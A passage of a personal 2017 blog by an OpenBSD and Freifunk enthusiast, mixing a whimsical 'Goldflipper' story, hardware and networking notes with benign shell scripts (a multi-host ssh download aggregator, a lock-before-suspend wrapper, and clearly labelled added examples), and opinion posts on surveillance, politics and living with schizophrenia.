Its systems were mostly overloaded. That was the part damaged from puffy's neurodotoxin and octopus's psyops. The fission reactor almost had an accident. There lay goldflipper and didn't make a noise, deep under the sand. Right near a pocket of oil.

Soon the EU flipper family noticed that there was something deep under the sand by means of sonar. Flippers have a tendency to scout for food under the sand. There they found him breathing but not well. They took him into shlepp tow and brought him to port.

Since Goldflipper had very little battery left they first gave him a coat of black solar scales, so that the sun could power goldflipper. They repaired the fission reactor but shut it down. It was not common for flippers to use fission reactors anymore in the 2000's, goldflipper was a real blast from the past.

Next the flippers gave him new non-magnetic steel frameworks allowing goldflipper to keep its balance better, and also outfitted a fuel cell for extra power that was scouted by the flippers during a "wandertag" in Franconia. A set of Li-Ion batteries were installed as well, much later due to the finding that a fuel cell with battery combination is a much better combination for cyborgs.

By now goldflipper was mostly black. Under its skin was still a bit of gold but it was mostly covered up by black scales and oil that kept oozing out of goldflipper due to its repairs caused by the fight with octupus. Puffy once came around and called him "Blobby" because it reminded him of a whale. At the sight of the taunting puffy goldflipper almost lost its cool and destroyed some Puffy CD's out of its library.

Nonetheless the Flipper family did a good job in repairing goldflipper, but everyone was getting old and tired of the task. One flipper caught the neurodotoxin from puffy and was sickened so bad she had to be put in a wheelchair. The time was right for goldflipper to tell its story, when Jupiter made a full revolution from the constellation Virgo, which had the sun in it when Puffy and Octupus attacked Goldflipper. Goldflipper who was a virgin reborn due to the repairs felt that now was the right time to tell.

Soon goldflipper would be able to show its new armour and insides to the world. It amassed a lot of RAM and CPU power over the years. It could let everyone know that it survived the attack by puffy and octopus, which was already told to the caribbean sea many moons ago, but that was a different story. Revenge on puffy is probably not a good idea, but octopus may have it coming, because puffy noticed octupus told him lies. Only time will tell. Goldflipper lives!



OpenBSD 6.1 was released yesterday

April 12th, 2017

Congratulations to the entire team that find time to give us the best OpenBSD OS yet.



Registered Goldflipper.DE

April 12th, 2017

I once had goldflipper.net but this time a .de is cheaper. The funny thing I noticed is when you compact goldflipper to AUflipper it sounds like someone who gets lippy. That's me for sure, in my younger days.



Upgraded most my servers and hosts to OpenBSD 6.1

April 14th, 2017

I was very busy yesterday and today upgrading most my hosts to OpenBSD 6.1. The upgrade process was straight forward and I don't have any complaints. Thank you OpenBSD!



Purchased/Ordered a Wacom CTL-490DW

April 17th, 2017

OpenBSD has support for this wacom tablet and I have a need for doing some drawings or illustrations. Hopefully it'll work out.



Von der Leyen and Bundeswehr should listen to this

April 18th, 2017

I've always said that networks and computer systems should be defensive only. However the German Bundeswehr insists on installing "active" offensive network mechanisms. In my opinion this is the wrong way about this. Bruce Schneier a cryptography expert agrees that there must be a balance. In my opinion, what Germany really needs is a secure operating system and secure network infrastructure, not a bunch of smurfers or DDos'ers. The OpenBSD operating system which focuses on correctness, security and functionality has a few innovations that help in this field. Trust me, this is the correct way. Active attack is so wrong in the eyes of a system and network administrator such as me. You guys need to learn! And by that I mean that the Internet is very delicate, and any nonsense such as "cyberwar" will not go over well.



Got the Wacom CTL-490

April 21st, 2017

Well I got the Wacom. I unwrapped it... plugged it in. and I see this in my dmesg:

uhidev3 at uhub0 port 8 configuration 1 interface 2 "Wacom Co.,Ltd. Intuos PS" \
rev 2.00/1.00 addr 5
uhidev3: iclass 3/1, 1 report id
ums1 at uhidev3 reportid 1: 5 buttons
wsmouse2 at ums1 mux 0

It didn't work right away, I first had to restart X11 with control-alt-backspace. Then it really worked! I fired up gimp and made 2 doodle drawings. This is the second drawing I made with it on OpenBSD and gimp:

I'm very satisfied! Thank you OpenBSD and thank you to the author of the uwacom(4) driver Frank Groeneveld! I'll be making more detailed illustrations of Goldflipper in the time to come.



First draft of image of Goldflipper attack

April 21st, 2017

There is more to come.



Second image for Goldflippers attack

April 21st, 2017



Goldflippers escape

April 21st, 2017



Goldflipper is detected

April 24th, 2017



Goldflipper's new solarscale suit

April 24th, 2017



Government issued national ID card online

April 24th, 2017

Before a nation decides to hook everyone to an ID card, I'd like to remind them that not everyone runs windows. And it is against our democratic right to be forced to use windows. No, I don't run a Macintosh at all times either. My OS (betriebsystem) is OpenBSD. If you'd like me to run your ID card, I expect a fully open sourced driver to my OS. The driver has to satisfy the OpenBSD developer community in order to be accepted into the base kernel system. No, it isn't linux and it's not linux compatible! There is a lot of OS's other than Windows and Macintosh, AND I'm afraid you'll have to satisfy all instances if you want 100% coverage. This means jobs for developers. It can be done. Please make it so!



In 6 days we're 8 years old (with history)

May 1st, 2017

Happy anniversary!



Why do we need more than one State-run TV station?

May 8th, 2017

Rumour has it that the state-run TV and Radio stations are wanting to increase the GEZ tax. Now the question abounds to.. why do we even need more than one state run TV station? As the "official" voice of the state we don't need two! In german these state run behemoths are called "Oeffentlich-Rechtliche Sender". Germany, you're not giving choice, you're milking ordinary citizens dry with GEZ taxes! Let there be only 1 TV and 1 Radio station that is from the government. Because even if we switch channels the message coming from the government will always be the same. There is no difference! Let some die! And we welcome the digitalization of the state-run TV station and radio.



Goodbye Soekris! Pity to see you go!

May 11th, 2017

Soekris was a small i386/amd64 computer on a rackmountable or desktop small case. They were driven out of business by the competition in Asia and what I think was a business mistake. Their long awaited products never left the drawing board last. I would have bought it but they scrapped it.

This is my soekris at home but it uses more connections than the one you see. In fact I utilize 1 external NIC card fully with 1 connection on the second card.

Goodbye Soekris rest in peace! It was probably the last Made in the USA computer that I bought, pre-snowden. For all those other manufacturers that are waiting on business, we want 10-Gigabit ports! Without them we can't justify buying more equipment. I also want under 20 watts power consumption on top of that.



Purchased a 4TB external USB3 harddrive

May 18th, 2017

In fact I did this last week even on the 12th. The new drive is amazing. It can be written to at 70 MB/s, I find that extremely high. And that's only from copying from the internal drive on my computer "earth" (mac mini) to it, so it may just be limited to the read speed of earth's internal hd.

First I wanted to encrypt this drive but noticed that I had too many sectors in order to use softraid's crypt. I guess softraid by default is limited to 2TB unless you fiddle with the sector size which I did not want to do. So I left it unencrypted, on FFS2.

I already put some backups on this drive:

Filesystem     Size    Used   Avail Capacity  Mounted on
/dev/sd1a      3.6T    367G    3.3T    10%    /backup

Now you may wonder why it's 3.6 TB here and I said 4TB. Well WD sold this with the label "1 TB == 1 trillion bytes", so let's do some math.

$ dc
4 1000 * p
4000
1000 * p
4000000
1000 * p
4000000000
1000 * p
4000000000000
1024 / p
3906250000
1024 / p
3814697
1024 / p
3725

It comes very close to 3.6 in fact when I do the last step with a calculator I get 3.6376953. (dc doesn't give me decimal places in the way I'm using it). I'm overall pretty happy with this purchase. I've never had this much capacity before.



Purchased 2 WR-1043ND Routers for Freifunk

May 22nd, 2017

I purchased two more routers for Freifunk. I need these to accelerate my network at home a little. In other news I'm trying to give out a few WR-841 routers to stores near here in order to grow the Freifunk in my neighbourhood. We recently got a new router for Schweinfurt and the Freifunk Net is gonna rock!



Built an aggregator for big files

May 25th, 2017

I had the problem of getting 8 Mbps downloads across the Big Pond (tm) from my VPS psi.virgostar.net. So I constructed a little system with scripts and ssh to aggregate several locations together. Now I get ~30 Mbps.

As you can see this is how it works, each arrow is an ssh connection. BPI is the Big Pond Internet, the area where I cross the ocean. I checked I get routes from Tata, Telia and Cogent, so everything is nicely dispersed and they can't put 2 and 2 together and throttle all my hosts. At uranus I assemble the temporary files into 1 big md5 summed file. If the md5 sum is fine then it deletes the temp files. Below is the script from Uranus which does most the work of chopping up the workload for each host.

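#!/bin/sh
# Fetch one file from psi in four chunks, each pulled over a different
# ssh path, then reassemble it locally and compare the md5 sum.

if [ $# -ne 1 ] ; then
        echo "usage: $0 file" >&2
        exit 1
fi

# ssh hands its arguments to the remote shell as one command line, so
# local quoting alone does not protect the file name. Refuse anything
# outside a conservative character set.
case "$1" in
*[!A-Za-z0-9._/-]*)
        echo "unsafe file name" >&2
        exit 1
        ;;
esac

# Called with only a file name, pipe.sh answers with a colon-separated
# record: field 2 is the size, the last field is the md5 sum.
RET=`ssh psi /home/pipe/pipe.sh "$1" || echo NSF`

if [ x"$RET" = x"NSF" ] ; then
        echo no such file
        exit 1
fi

SIZE=`echo "$RET" | awk -F: '{print $2}'`
MDSUM=`echo "$RET" | awk -F: '{print $NF}'`

# Length of one chunk, in the unit pipe.sh expects (pipe.sh is not shown).
CHIP=`expr "$SIZE" / 4096`

date
echo getting 4 chunks of size $CHIP
TMP1=`mktemp 1.XXXXXXX`
TMP2=`mktemp 2.XXXXXXX`
TMP3=`mktemp 3.XXXXXXX`
TMP4=`mktemp 4.XXXXXXX`
BASENAME=`basename "$1"`

# Three chunks are fetched in the background through the relay hosts;
# the fourth comes straight from psi in the foreground with length 0.
ssh omega /home/pipe/pipe.sh "$1" 0 $CHIP > $TMP1 &
OFFSET=$CHIP
ssh supercluster /home/pipe/pipe.sh "$1" $OFFSET $CHIP > $TMP2 &
OFFSET=`expr $CHIP \* 2`
#OFFSET=`expr $OFFSET + 1`
ssh chi /home/pipe/pipe.sh "$1" $OFFSET $CHIP > $TMP3 &
OFFSET=`expr $CHIP \* 3`
#OFFSET=`expr $OFFSET + 1`
ssh psi /home/pipe/pipe.sh "$1" $OFFSET 0 > $TMP4

wait %1
wait %2
wait %3

cat $TMP1 $TMP2 $TMP3 $TMP4 > "$BASENAME"

# Keep the temp files for inspection if the sums differ.
SUM=`md5 "$BASENAME" | awk '{print $NF}'`
if [ "$SUM" != "$MDSUM" ] ; then
        echo sums do not match!
        exit 1
fi

echo file is $BASENAME
date
rm -f $TMP1 $TMP2 $TMP3 $TMP4

exit 0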

There are intermediate scripts on omega, chi and supercluster and another big script on psi to make this all work. But I'm not gonna share it all here.
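The split, parallel fetch, reassembly and verify-before-cleanup steps described above, as an added example run against a local file; it is not the blog author's code. `serve_chunk` is a hypothetical stand-in for the unpublished `pipe.sh`, and the 1 KiB block unit, the "count 0 reads to end of file" convention and the use of SHA-256 in place of md5 are assumptions.

```sh
#!/bin/sh
# Added example, not the blog's scripts. serve_chunk() is a hypothetical
# stand-in for the unpublished pipe.sh; block unit and semantics are assumed.

BS=1024

# SHA-256 of a file, using whichever tool the platform ships.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum < "$1" | awk '{print $1}'
    else
        sha256 -q "$1"          # OpenBSD, FreeBSD
    fi
}

# serve_chunk FILE OFFSET COUNT
# Write COUNT blocks of FILE, starting at block OFFSET, to stdout.
# COUNT 0 means "from OFFSET through end of file".
serve_chunk() {
    if [ "$3" -eq 0 ]; then
        dd if="$1" bs="$BS" skip="$2" 2>/dev/null
    else
        dd if="$1" bs="$BS" skip="$2" count="$3" 2>/dev/null
    fi
}

# fetch_chunked SRC DEST EXPECTED_DIGEST [PARTS]
# The expected digest is supplied by the caller, as it would be when it
# arrives from the origin host separately from the data.
fetch_chunked() {
    src=$1; dest=$2; want=$3; parts=${4:-4}
    size=$(wc -c < "$src" | tr -d ' ')
    chip=$(( size / BS / parts ))
    # A file shorter than PARTS blocks gives chip=0; every worker would then
    # ask for "offset 0, read to EOF" and the file would be duplicated.
    if [ "$chip" -eq 0 ]; then parts=1; fi

    dir=$(mktemp -d "${TMPDIR:-/tmp}/chunks.XXXXXXXX") || return 1
    i=0; pids=""
    while [ "$i" -lt "$parts" ]; do
        cnt=$chip
        # The last worker reads to EOF so the remainder is not lost.
        if [ "$i" -eq $(( parts - 1 )) ]; then cnt=0; fi
        serve_chunk "$src" $(( i * chip )) "$cnt" > "$dir/part.$i" &
        pids="$pids $!"
        i=$(( i + 1 ))
    done

    failed=0
    for p in $pids; do
        wait "$p" || failed=1
    done

    # Assemble under a temporary name; only a verified file gets DEST.
    : > "$dest.partial"
    i=0
    while [ "$i" -lt "$parts" ]; do
        cat "$dir/part.$i" >> "$dest.partial"
        i=$(( i + 1 ))
    done

    if [ "$failed" -ne 0 ] || [ "$(digest "$dest.partial")" != "$want" ]; then
        echo "transfer failed verification; parts kept in $dir" >&2
        rm -f "$dest.partial"
        return 1
    fi
    mv "$dest.partial" "$dest" && rm -rf "$dir"
}

# Demo on a constructed sample file whose size is not a multiple of 4 KiB.
demo() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/demo.XXXXXXXX") || return 1
    awk 'BEGIN { for (i = 0; i < 2000; i++) print "line", i }' > "$d/src"
    fetch_chunked "$d/src" "$d/out" "$(digest "$d/src")" &&
        cmp -s "$d/src" "$d/out" && echo "reassembled and verified"
    rc=$?
    rm -rf "$d"
    return "$rc"
}
demo
```
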



Played with my wacom a few days ago...

May 26th, 2017

Or... from a different perspective:

Go flipper go!



Launched first page of http://goldflipper.de

May 30th, 2017

I have launched the first page, more to follow on goldflipper.de. I think it looks great so far. Also check out the reload: the colour border is randomly created.



Why I think America is greedy, under Trump's presidency

June 1st, 2017

I don't know why Donald Trump thinks America is getting the short end of the stick in trade. Let's look at some facts. America has a monopoly in data. You know..google, microsoft, apple, facebook, twitter, amazon, what have you, those are all american companies. There is not too much competition for these that I know other than perhaps baidu in China and vzkontakte in Russia. So while the rest of the world is locked-in to american data brokers, they are saying they are getting the bad deals. This is greedy! As you may know, data isn't profitable by itself. But massage it with analysis it is very valuable and it is powerful. The trick is to run powerful algorithms over it after it's being collected.

Now, the NSA has access to some of that data and they have their own data. But the NSA isn't for-profit per se. But they run some of the same algorithms that for example google might. It's in their interest and again they have a monopoly of this data in the world. You may remember the spy plane that was damaged in April 2001 as it was collecting data from cell phones in China. That is what's called aggressive data collection.

So while perhaps other areas in trade are lacking overall, the "data" cannot be overlooked. And that's why I think America is greedy.



Registered freifunk-schweinfurt.de

June 8th, 2017

I'm an avid Freifunker and Schweinfurt just got a hood, which means we have a few gateways (tunneling gateways) for our city and the immediate region. Anyone from the Schweinfurt Hood can get a hostname in this domain, just email me, or find me on IRC. The new domain forwards http to the Freifunk Franken Schweinfurt section. Yay!



Donation Time: OpenBSD gets 50 EUR

June 8th, 2017

I have donated 50 EUR to Theo de Raadt. OpenBSD is an operating system for all sorts of computers. Keep up the great work, OpenBSD!



Schizophrenia does not 'burden' society

June 8th, 2017

A friend sent me this article. I read the Objective in the abstract and stopped reading at the sentence "Given the immense cost to society"... What costs? I have schizophrenia and I work. I pay my own health insurance, rent and I take my meds. There is no costs on society. The sentence itself is self-justifying, in other words selfish. In fact I'll tell you right now I do not have any "voices from god" telling me to stab someone 3 doors down. That's not what my illness is about. In fact if I were such a danger to society then how come I can do everything anyone else can.

Except, it's harder to find work. Since my diagnosis of schizophrenia I held three jobs. Two of them I was fired from, the third I'm on right now, and I'm hoping to be working in the future at some other job. I spent 7 years on welfare and this was because I could not even convince anyone for a job interview.

Put yourself in my shoes, first everyone ignores you, and then they say you're a burden because you don't have work. Let's get rid of the stigmas, because we're very capable people, and not all of us hear voices. In fact I don't. Even without medication I do not hear voices, sorry to spoil your fanatical view of schizophrenics. The problem is people who freak out when they see someone they identify as a schizophrenic. And perhaps that's a burden to society.



This is the 1171st article of this blog

June 12th, 2017

I didn't realise I passed 1000 articles here. Even with 10 articles per month for the last 8 years I've surpassed 960 which is what I figured with 8 times 12 times 10. I'm very proud to be blogging still.

The keyword search engine is a very valuable tool as well. I use it often to find things I wrote about. One day I'd like to change this to an advanced search where you can use AND, OR or boolean search. But that'll have to hold for now.

It's also worth noting that this blog does not use an SQL backend. I use plain files to store the content. I use a small script in UNIX to add content (articles), and the editor is vi. With all the injection attacks on SQL I felt that what I did was much safer, but granted it doesn't scale on large blogs with 10,000's of articles. For my operation this is still OK.



100 million migrants, due north

June 18th, 2017

A minister in Germany warned that due to the pollution that's output by the industrialized countries many African citizens may be forced to migrate north. The numbers are staggering, one hundred million people. I'd like to explore this scenario a little, at least in my thoughts that I'd like to share.

I believe we have a responsibility to global pollution, it has after all given us temporary wealth here in Europe. We're currently a changing people. Industrialization paved way to the information age, and perhaps physical borders don't matter so much anymore. However in the EU we have roughly 500 million people, an addition of 100 million Africans would change our society in many ways. One in six people would be black if I am allowed to imagine that far.

Also our GDP would temporarily fall as not all Africans are rich, and chances are the poorer ones would migrate first. Perhaps instead of "integrating" these new people we should melt with them by meeting them halfway, with a new language. Esperanto perhaps. All pupils would go to school learn Esperanto as their first language with their previous language taking a second spot. It solves many problems, to do it this way as no one has an advantage at least in languages. Now in knowledge we'd probably benefit as even "the stupid" carry clues. Together we'd be able to gain a lot of knowledge, while the Information Technology developed helps us overcome. I'm talking about artificial intelligence.

Then, we'd probably have to make plans to migrate ourselves as well. Destination arctic and antarctic circles. As a northern hemisphere race we may spread into a southern hemispheric race as people settle on antarctica. Antarctica has a landmass the size of the United States. Migrating north or south.. I have seen first hand how this could work, because I visited a school friend who lives just south of the arctic circle in Canada. There are no trees, yet anyhow. As temperatures on earth rise perhaps the treeline will spread further toward the poles though. My friend's dwelling was built with wood. All things are really imported by giant ships during the summer season. This could work on a large scale for the European and African people who find themselves needing to move due to climate changes.

Europe is not Europe anymore, and Africa is not Africa. The global conditions have changed, this is a fact. Cultures disappear, get surpassed by new cultures. If you are against this cultural shift just look to history. We were never a culture for thousands of years, it was always dynamic, and we always had to adjust. It is important that we work together, not to make us poorer but to survive as a human species. And that's what I think and that's what I believe would be happening in the next 70-100 years which I will probably not see.



Solstice in 2 days

June 19th, 2017

Solstice is in 2 days, on wednesday at 6:24 AM CEST, or 4:24 UTC. Happy solstice!



Turned the fan on first time for 2017

June 19th, 2017

I got the fan out. It's 50 watts which is hopefully gained back by the countless solar panels we have in Germany. We should have a surplus in "green" energy today as there is no cloud in the sky and wind is blowing.



I'm against governments hacking our devices

June 22nd, 2017

Hacking (cracking) is illegal. Everywhere in the world. Yet governments want to bend the rules and hack our devices. This is not just two-faced, it also goes against our human rights. The PDA or even a smartphone is an extension of the body and mind. We carry these devices because we want to know the time, date, location, translate language and have a pointer where we saw something to make a point to someone else. It allows us better expression. It is an extension of our body and mind and should fall within privacy laws for individuals.

If countries hack devices where will it end? Would privacy erode and we'd be subject to carrying implanted chips? Why all this madness? Why is there so much mistrust? 99.81 percent of us are good-willed beings and we don't do what our governments don't want us to do (adhering to the laws). So why should our security be compromised because of a measly 0.19 percent? It should not be analysed whether we are in fact adhering to the laws, it should be analysed why others want power over our most private parts. I smell corruption.



My new xlock with suspend

June 23rd, 2017

Now that the german government can install trojans on our computers I have decided to wrap zzz with xlock so that when I put the computer to sleep, it will also lock the computer.

beta$ more bin/zzz
#!/bin/sh

xlock &
sleep 2
/usr/sbin/zzz
exit 0

That's what the /home/pjp/bin/zzz script looks like. Thanks to abyxcos on IRC for the discussion.
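The script above suspends two seconds after starting xlock whether or not xlock is still running at that point. As an added example (not the author's script), this variant checks that the locker process is alive before suspending and refuses otherwise; the LOCKER, SUSPEND and GRACE variables are names introduced here so the check can be exercised with stand-in commands.

```shell
#!/bin/sh
# Added example, not the post's script: lock, confirm the locker survived,
# then suspend. LOCKER, SUSPEND and GRACE are names chosen for this example;
# their defaults are the commands and the delay used in the post.
LOCKER=${LOCKER:-xlock}
SUSPEND=${SUSPEND:-/usr/sbin/zzz}
GRACE=${GRACE:-2}

lock_then_suspend() {
    # Unquoted on purpose so LOCKER may carry arguments.
    $LOCKER &
    locker_pid=$!

    # Same fixed delay as the original script: time for the locker to
    # take over the screen (or to fail, e.g. when it cannot reach X).
    sleep "$GRACE"

    # kill -0 delivers no signal; it only reports whether the process
    # still exists. If the locker already exited, the session is not
    # locked, so fail closed and leave the machine awake.
    if ! kill -0 "$locker_pid" 2>/dev/null; then
        echo "zzz: '$LOCKER' exited, not suspending an unlocked session" >&2
        return 1
    fi

    $SUSPEND
}

# Run only when installed under the name zzz, as in the post (~/bin/zzz).
# Under any other file name the script just defines the function.
case "${0##*/}" in
    zzz) lock_then_suspend; exit $? ;;
esac
```

A non-zero exit status means the machine was left awake because no locker was running.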



300,000 victims

June 25th, 2017

What is happening in Yemen is a shame. I'm set against the reasons why there needs to be war against the Yemeni people. The people are victims of a brutal onslaught by Saudi Arabia who want power of the entire Arabian peninsula. The cholera in Yemen could have been prevented had there been peace. I have images of Yemen in my mind before the war, which I saw on television, Yemen was doing well before.



Changes with DelphinusDNS

June 27th, 2017

Yesterday I completed a change in delphinusdnsd that takes out BerkeleyDB and replaces it with tree(3) macros as provided in BSD and libbsd. I committed the code for that yesterday in delphinusdnsd-current.

To fully test this I have registered delphinusdns.org. I have 6 months on this, and I have made my vps's chi and psi the authoritative nameservers for this. Hopefully I'll find more time to program on this good dns daemon before next year.



Donated $10 USD to FreeBSD Foundation

June 27th, 2017

After positive help from some FreeBSD'ers on IRC, I have decided to donate $10 to FreeBSD. Thanks for helping me make my software work on FreeBSD!



The endless fight around Freifunk

June 29th, 2017

Here in Germany we're suffocating on laws. If there is a law on how to breathe I wouldn't be surprised. Freifunk which I mentioned in the Subject is an initiative by citizens to provide a network free of cost to anyone. Most of the time we also provide Internet access. It's a good service paid for by the enthusiasts. Only, we're having a hard time growing because everyone is worried about liabilities, yes you got it, they aren't sure about the laws and would rather not have it. It's frustrating because approaching municipal governments and city halls is so much harder. They are so bureaucratic, and in my case I just got a nay to erect a repeater at a "citizens meet" which is a place for the people! And I got this nay not because the laws say I can't but because we're uncertain of the laws.

Now to tell you a little story, Freifunk is a great thing. People can use it when their own Internet doesn't work and we all know everything is tied to the Internet these days. If you have no access to the Internet ever you lose out. You may even lose your job if it's Internet based. Freifunk provides a new gateway at no cost of limitation to use. You can even use a VPN through Freifunk that's encrypted, no one cares. But it makes you feel safer, if you do that, so it's good. I often get the feeling people think that we're out to rip people off which is not the case. We want to blanket Germany with wifi and run an alternative to what "the others" are selling, and give it away for free.

I'm majorly peed off that these laws are creating uncertainty and fear, when it's perfectly legal. I want to provide some links for you:

  • Freifunk statt Angst
  • Freifunk.net
  • Freifunk.net in English

You are probably reading this from another country and probably don't know what "fuss" is. Fuss is when you have to beg with society over and over to bring about something that everyone needs. You probably never heard of this and if you didn't then you're most likely freer than us. We need freedoms!



    Das Internet darf kein rechtsfreier Raum sein

    June 30th, 2017

    "The Internet shall not be a lawless space" is the translation of that. This statement made by German politicians over and over, has a double meaning and can be interpreted in many ways. Let's look at who are the true masters of the Internet. It's nerds. It's programmers who spend countless hours programming to make some protocol work. And not just that but these programmers return to their own work to make a Request For Comment or other documentation for others to implement their ideas.

    Into the picture comes the politician and the lawyer, and the soldier and the cop. These guys historically held power in societies and find themselves in a power-vacuum on the "Internet". In fact these people don't know very much other than pulling a trigger or confusing the general public with extravagant words that usually have double meanings and are easily confused. They for the lawyer and politician part are tricksters. Now these people want control of "EVERYTHING" including the 'net. But they are lazy to learn for themselves, something that the common nerd is good at, so they make laws to inhibit the nerds. This is what it's all about. It's a trick. To spoil something that nerds worked hard at.

    My message to the tricksters. You're trying to unseat gods who created everything. Do you think you can maintain everything once you have unseated the gods? You don't know, but you're doing it. And if it fails we'll just go back to the times when there was no Internet. You'll outlaw it, isn't that the ultimate revenge for your own ignorance of not understanding something that is way more important than you'll ever be? It's happened everywhere and it'll continue to happen. Censorship and suppression.

    I don't need to study law to be a great programmer. You want to put me inside a box and say "you can't do that, you can't do this" by applying synthetic laws on a programmer. Programmers don't work that way, when they feel inhibited they lose interest real quick and go on to the next thing that may give them more playing field. We're not in-the-box type people. We may start off in the box, but eventually when we master something we can eliminate these thresholds easily.

    What we really need is freedom. And it has dawned on all the powerholders that if they take away your freedom with law, they can control you. But they are working off a set of programs that some geek designed for them who they then canned. So their protocols are outdated, and won't work in new domains. If you put law to technology, we lose the race against nature. You'll royally screw yourself if you do that. So to sum up.. the politicians and lawyers want laws so they stay in power, at the same time the cops and soldiers want to be above the law to stay in power, and the nerds are just feeling the pressure and rolling their eyes in disgust.



    Who I'm voting for in 2017

    July 3rd, 2017

    Germany has an election this year. Democracy at its finest. I'm voting for "Die Linke" and I'll tell you why. The CDU/CSU has no pledges, meaning you can vote for them but you don't know what you're voting for. Also under Merkel that party has seen to the rich getting richer and the poor losing money. The other party, the SPD, is not extreme enough for me. They are somewhat on the right track, but since they are in a coalition government with the CDU/CSU this term we haven't really benefited from them. Then there is the green party. These guys have become switch hitters with the so-called Jamaica coalition. It's called Jamaica coalition because of the party colours black, yellow and green, which is a coalition between CDU, FDP and greens respectively. I do like them, but not enough. The other parties in my view are not worth mentioning.

    What draws me to "Die Linke"? It's not so much the personalities of the politicians but rather their mandate. They are for radical changes in minimum wage for example. Meaning the poor would be getting more. And then they also want to tax the rich heavier, which means the money that the poor get would be coming from the rich. Also I want to keep the option open for a Red-Red-Green coalition. With my vote I'm putting pressure on the SPD to accept a coalition with "Die Linke" if they want to rule, if they don't want to rule no loss.

    Unfortunately I'm part of the reason that the rich get richer. Because I've been working for underpaid wages for the last 7 years while my ex-boss got rich by selling his investment to a larger company. This is exactly how the rich get richer, they do start-ups and pretend there is no money, then they sell for millions and you won't hear from them for a decade or so. I'm actually not getting much of a pension (perhaps 50 EUR a month) which means I'll be in poverty at old age, which means now is the time to work toward the sane goal of a basic income, which makes sense because all the money that the rich have made is re-invested into robotics to keep human labour low, and they get even richer. I'm very sorry to know this.



    My new Network Map 2017

    July 4th, 2017

    Yesterday I was laying new cabling and pulled out some old cabling, this is what my network looks like now:

    Network map (2017-07-04):		 +---------+
    					/          | <- (Freifunk VXLAN)
    [gaia]--             [freifunk wr-1043]/     	   |
              \               |     |     /         [mercury]
    [phone1] - \              |     |    /             |
                ---	[uranus] === [Access Point] --- [gamma] ---- to pppoe cloud
    [phone2] - /	          |     |  /
              /	          |	| /
    [beta]--	(BATMAN)->|	|/
    			  +--[venus]-+--[spica]
    				 |   |
    				 |   +--[fritzbox LTE]------- to LTE network
    				 |   |
    				 |   +--[Telekom IPTV]
    [Freifunk wr-841v10 2.4GHz]	 |   |
    [Freifunk wr-841v10 2.4GHz]	 |   |
    				 |   +--[Samsung TV]
    				 |   |
    				 |   +--[saturn]
    				 |
    				 |
    				 |<-(freifunk B.A.T.M.A.N.)
    				 |
    				 |
    			     [freifunk wr-841v8]
    
    Legend:				Hosts:
    
    --- CAT5 cabling		gaia + spica: apple computers running vmware
    === wifi 5 Ghz			uranus: OpenBSD i386 behind Fritz!Repeater
    |   CAT5 cabling		venus: OpenBSD amd64 on Soekris hw
    				gamma: OpenBSD amd64 on PC Engines APU
    				fritzbox: AVM fritzbox router
    				mercury + beta: OpenBSD + FreeBSD hosts
    
    End of Network map.
    
    If you like ASCII this is for you.



    Wrote a donation for F3 Netze e.V.

    July 4th, 2017

    I wrote a donation for F3 Netze for 25 EUR. On Friday I'm bringing the transfer to the bank. Unfortunately F3 Netze hasn't opened a Paypal account yet, but I was going to the bank anyhow.

    I also pledged 44 EUR to someone else in the Freifunk Organization for a yearly discount on a server. He has to check his finances first though. Slowly the freifunk hobby is starting to cost money, which is great, but I have to watch it not to spend too much on this hobby. I'm gonna write up a budget soon.

    If anyone of freifunk-schweinfurt is reading this, I have also pledged money to you so make means available that I can help you (paypal, bank account #'s, etc).



    Nuclear Powerstations should not be on the Net

    July 8th, 2017

    I'm gonna say it again. Get off the 'net, you have no business there and it's too risky. Same goes for nuclear bombs. They should not be on the Internet. You don't even have to think this through... hackers are everywhere, nothing is safe.



    Google, Apple and co, how does that work?

    July 9th, 2017

    As you know these two named companies have been backtaxed by the EU with a lot of money for evading taxes. Apple itself has 200+ billion in cash and wouldn't really need to care if they have to pay 13 billion EUR in backtaxes. However these companies will continue their tricks and the EU will continue to say that they broke laws. So what to do? What's gonna happen? For one the EU has no real competitor against these companies that offer similar products and services. And if the EU tax tolls become too heavy Google and Apple may decide not to pay up. What will happen then?

    Let's look to times when Google had problems with China. What they did was move to Hong Kong and out of China and made use of the dual law system in Hong Kong. Could they do the same here in Europe? What if they made use of Brexit and invested heavily into Britain and made European users use the British installation. At that point they would be out of jurisdiction from EU governments and if they cozy up to the British government it could be worthwhile.

    I think it would be worthwhile for the EU to build its own Google-like system much like Airbus was made in response to Boeing for airplanes and space systems. Just how is it gonna be flourishing with all these laws? Time will tell.



    Purchased two books from Amazon

    July 9th, 2017

    I have purchased two books:

    1. The Linux Programming Interface: A Linux and UNIX System Programming Handbook - Michael Kerrisk, this one was on recommendation by Habbie in #dns
    2. Ansible: From Beginner to Pro - Michael Heap

    Thanks to all who helped!



    When you're at a crossroad

    July 10th, 2017

    Then take a picture.



    Food for the human people!

    July 10th, 2017

    MMMMMMH!



    On Friday the UNIX timestamp turns 1500000000

    July 10th, 2017

    Here is the exact time and some significant others.

    beta$ date -r 1500000000
    Fri Jul 14 04:40:00 CEST 2017
    beta$ date -r 1400000000
    Tue May 13 18:53:20 CEST 2014
    beta$ date -r 1000000000 
    Sun Sep  9 03:46:40 CEST 2001
    
    Here are some others in the future:
    beta$ date -r 2000000000
    Wed May 18 05:33:20 CEST 2033
    beta$ date -r 1600000000
    Sun Sep 13 14:26:40 CEST 2020
    
    For those that don't know the timestamp is seconds since January 1st 1970.



    Delphinusdnsd is pledged

    July 11th, 2017

    I just put the code in. I had to disable the TTL code that shows how many hops a requester went through for the query to my daemon. This is because pledge doesn't know about pledging IPPROTO_IP setsockopts yet, it seems. All is good, the new code is in production on chi.goldflipper.de for the zone delphinusdns.org. Yay!



    New surveillance powers in the Netherlands

    July 12th, 2017

    This webserver is located in the Netherlands. A new bill gives the Dutch security services rights to spy on all traffic. Since I'm currently not encrypting my webserver this means little privacy for my readers. However the powers won't be in effect until Jan. 1st, 2018, so there is some time to prepare. In the worst case scenario I'll just leave this VPS. Sorry.



    Hamburg G20

    July 13th, 2017

    It is the federal government who invited the G20 to Hamburg. Hamburg is a host to conferences but the damage done was envisionable pre-conference. So it should be the federal government who pays up for damages done. A lot of looting, shooting and burning happened there, but I don't blame Hamburg I blame the federal government.



    Putting the car on ice

    July 16th, 2017

    I'm getting second thoughts about getting a car in August. I'll hold off for now while I'm not sure what to do. Partially I'm scared of driving again.



    America, you're more than great...

    July 17th, 2017

